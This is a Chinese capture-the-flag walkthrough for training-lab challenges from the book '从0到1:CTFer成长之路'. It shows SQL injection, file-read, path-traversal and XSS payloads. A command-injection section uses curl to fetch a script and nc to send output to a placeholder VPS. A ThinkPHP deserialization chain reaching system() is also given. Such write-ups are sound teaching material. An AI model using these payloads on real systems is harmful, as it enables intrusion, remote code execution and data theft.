i春秋《从0到1:CTFer成长之路》通关WP
目录
一、常见的搜集
二、粗心的小李
三、SQL注入-1
四、SQL注入-2
五、afr_1
六、afr_2
七、afr_3
八、死亡ping命令
九、XSS闯关
十、文件上传
十一、thinkphp反序列化利用链
一、常见的搜集
题目内容:一共3部分flag
使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描:
打开第一个URL:
发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1
打开第二个URL:
可以得到flag2:s_v3ry_im
打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}:
组合即可得到完整flag:n1book{info_1s_v3ry_imp0rtant_hack}
二、粗心的小李
题目内容:看看能不能找到信息吧?
1、打开题目提示git信息泄露,直接使用git信息泄露利用工具git_extract下载git泄露的文件:
2、打开下载的index.html文件即可得到flag:n1book{git_looks_s0_easyfun}
三、SQL注入-1
题目内容:SQL注入-1
1、爆字段长度
http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=1' order by 3 --+
2、爆当前库名
http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,database(),3 --+
3、爆表名
http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note' --+
4、爆列名
http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g' --+
5、爆值
http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,group_concat(fllllag),3 from fl4g --+
6、取得flag:n1book{union_select_is_so_cool}
四、SQL注入-2
题目内容:SQL注入-2
1、布尔注入题,直接上SQLMAP吧,注入点是name:
2、上sqlmap,得到flag为n1book{login_sqli_is_nice}:
五、afr_1
题目内容:afr_1
1、afr(Arbitrary file read)考虑是任意文件读取,测试一下有哪些文件,发现有flag,但是没有显示flag:
2、考虑使用PHP封装协议读取PHP文件:
http://eci-2ze73nro8j9t9uiqiiqf.cloudeci1.ichunqiu.com/?p=php://filter/read=convert.base64-encode/resource=flag
3、将返回的值用base64编码解码,得到flag:n1book{afr_1_solved}
六、afr_2
题目内容:afr_2
1、发现IMG目录可以列目录:
2、在img目录后加上../进行目录穿越:
http://eci-2zeiuwocknfo2h9486dd.cloudeci1.ichunqiu.com/img../
3、访问flag文件获取flag:n1book{afr_2_solved}
七、afr_3
题目内容:afr_3
暂未做出
八、死亡ping命令
题目内容:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串,试试看如何绕过呢?
1、使用burp测试命令执行,发现可以在ip=%0A后执行命令。
2、经测试无法反弹bash到vps。可以使用执行curl命令下载sh脚本到服务器,再执行的方式,将结果nc到vps回显执行的命令。
3、在VPS的web服务器部署1.sh文件,内容如下:
ls / | nc x.x.x.x 8890
4、执行:
%0Acurl x.x.x.x/1.sh > /tmp/1.sh
5、vps上使用nc监听端口:
nc -lvvp 8890
6、执行:
%0Ash /tmp/1.sh
7、可以看到vps上反弹了ls /命令执行的结果:
8、使用同样的方式在VPS上创建2.sh内容为:
cat /FLAG | nc x.x.x.x 8890
9、使用同样的方式重复3-6步下载到靶机中,然后运行获取到flag:n1book{6fa82809179d7f19c67259aa285a7729}
九、XSS闯关
题目内容:你能否过关斩将解决所有XSS问题最终获得flag呢?
1、点击“点我开始”按钮,进行XSS闯关。第一关:随便输入<script>alert(1);</script>即可过关。
http://eci-2ze6hmaj0gtidor7pzph.cloudeci1.ichunqiu.com/level1?username=<script>alert(1);</script>
2、过关后跳到第二关,查看url,level1变成了level2,于是依次修改到level7,就提示通关,获取了flag:n1book{xss_is_so_interesting}
http://eci-2ze6hmaj0gtidor7pzph.cloudeci1.ichunqiu.com/level7?username=
十、文件上传
题目内容:文件上传
暂未做出
十一、thinkphp反序列化利用链
题目内容:对一个框架的反序列化进行利用链挖掘
分析参考:https://blog.csdn.net/zy15667076526/article/details/114975476
poc:
<?php
namespace think;
abstract class Model{protected $append = [];private $data = [];function __construct(){$this->append = ["ethan"=>["calc.exe","calc"]];$this->data = ["ethan"=>new Request()];}
}
class Request
{protected $hook = [];protected $filter = "system";protected $config = [// 表单请求类型伪装变量'var_method' => '_method',// 表单ajax伪装变量'var_ajax' => '_ajax',// 表单pjax伪装变量'var_pjax' => '_pjax',// PATHINFO变量名 用于兼容模式'var_pathinfo' => 's',// 兼容PATH_INFO获取'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],// 默认全局过滤方法 用逗号分隔多个'default_filter' => '',// 域名根,如thinkphp.cn'url_domain_root' => '',// HTTPS代理标识'https_agent_name' => '',// IP代理获取标识'http_agent_ip' => 'HTTP_X_REAL_IP',// URL伪静态后缀'url_html_suffix' => 'html',];function __construct(){$this->filter = "system";$this->config = ["var_ajax"=>''];$this->hook = ["visible"=>[$this,"isAjax"]];}
}
namespace think\process\pipes;use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{private $files = [];public function __construct(){$this->files=[new Pivot()];}
}
namespace think\model;use think\Model;class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()));//str=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A5%3A%22ethan%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22calc.exe%22%3Bi%3A1%3Bs%3A4%3A%22calc%22%3B%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A5%3A%22ethan%22%3BO%3A13%3A%22think%5CRequest%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00hook%22%3Ba%3A1%3A%7Bs%3A7%3A%22visible%22%3Ba%3A2%3A%7Bi%3A0%3Br%3A9%3Bi%3A1%3Bs%3A6%3A%22isAjax%22%3B%7D%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A1%3A%7Bs%3A8%3A%22var_ajax%22%3Bs%3A0%3A%22%22%3B%7D%7D%7D%7D%7D%7D
?>
按图执行获取FLAG:n1book{de70641304640057390e8fabc8b515bf}
i春秋《从0到1:CTFer成长之路》通关WP相关推荐
- 从0到1:CTFer成长之路
作者:Nu1L战队 出版社:电子工业出版社 品牌:电子工业出版社 出版时间:2020-10-01 从0到1:CTFer成长之路
- 《从0到1:CTFer成长之路》 [第一章 web入门] 常见的搜集
<从0到1:CTFer成长之路> [第一章 web入门] 常见的搜集 启动环境: 提示为敏感文件,首先对网站目录进行扫描: 得到如上页面,首先访问robots.txt页面: 得到flag1 ...
- 《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-2
[第一章 web入门]SQL注入-2 一.信息收集 1.首页 2.登录成功会跳转到 3.进行测试判断 二.尝试破解 1.用post型的sqlmap破解 <1>.首先,开burp截包 < ...
- 从0到1:CTFer成长之路docker环境搭建
1. 安装 docker 使用官方安装脚本安装 sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使 ...
- CTF学习记录 i春秋 《从0到1:CTFer成长之路》文件上传
21.10.19 第二次开始学习CTF 感觉很有收获 至少有让自己忙起来了的感觉 感觉有一些学习状态了 打算重新记录一下学习笔记!加油 我会坚持下去的! 题目代码 首先附上题目的代码段(不完整) sh ...
- 《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF
还是任意文件读取漏洞 进入坏境 点入链接 这边可以读取文件 试一试article?name=../../../etc/passwd 读不到flag /proc详解 linux进程与它的文件描述符./p ...
- 《从0到1:CTFer成长之路》SQL注入-2
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境,老规矩先查看源码 有提示,那就先用提示来做吧,简单快捷易上手了属于是: 手工方法: 1. 随便输入一个账号试试: 输入ad ...
- 《从0到1:CTFer成长之路》1.3 任意文件读取漏洞
文章目录 1.3.1 文件读取漏洞常见触发点 1.3.1.1 web语言 1. PHP 2.python 3.Java 4.Ruby 5.Node 1.3.1.2 中间件.服务件相关 1.Nginx错 ...
- 《从0到1:CTFer成长之路》粗心的小李
前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 这边给了提示,是吧git放到了外网环境,直接扫一下目录吧,查找一下git目录 git目录下是有东西的 所以我们可以利 ...
- 《从0到1:CTFer成长之路》常见的搜集
前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 看到信息搜集,直接用扫目录软件开扫 扫到了这个网页,我们进去查看一下 发现他给我们提示了一个网址,我们进入这个网址 ...
最新文章
- 澳洲中本聪Craig Wright涉嫌论文抄袭?
- Webpack实现按需打包Lodash的几种方法详解
- Java的新项目学成在线笔记-day12(六)
- todo:过几天熟悉下Github
- macOS安装Maven_IDEA集成Maven
- 好玩gan_效果超赞服务器挤爆!用GAN生成人像油画火了,带你一秒回到文艺复兴...
- 转进制(信息学奥赛一本通-T1161)
- python编写函数判断三角形_使用Python三角函数公式计算三角形的夹角案例
- 接口测试--ssl证书问题
- leveldb - log格式
- ANT安装(亲测可用)
- AS2在FLASH中调用EXE文件方法详细说明 已测试可行
- 机器人动作编辑器说明
- 犹太人很会赚钱?一老板用犹太人的思维做生意,一年赚了200多万!
- appcan java_AppCan项目源码
- 202203Self-Supervised Pretraining and Controlled Augmentation Improve RareWildlife Recognition inUAV
- 当今社会到底更需要专才还是通才
- 工作室多拨宽带如何优化?
- node 压缩图片_用图压批量压缩图片就这么简单
- 老毛桃u盘重装win7教程|老桃毛U盘重装系统图文步骤
热门文章
- 「技术选型」Solr与ES难以抉择?且看第一回
- UE高级性能剖析技术(三)-- Android内存分布和优化
- a55 matlab排列组合_matlab矩阵排列组合
- 项目vite1.0升级到2.0打包遇到Some chunks are larger问题如何解决
- Bios开启CPU虚拟化后,进不了系统,解决办法如下
- 服务器怎么设置自动拨号,网件路由器怎么设置自动拨号
- 多自由度有阻尼matlab,有阻尼多自由度系统固有频率、阻尼的求取
- Edwin windows下基本命令:
- 计算机鼠标不灵活怎么办,鼠标不灵怎么办 鼠标不灵的常见解决方法
- Python提取CSV数据统计四分位数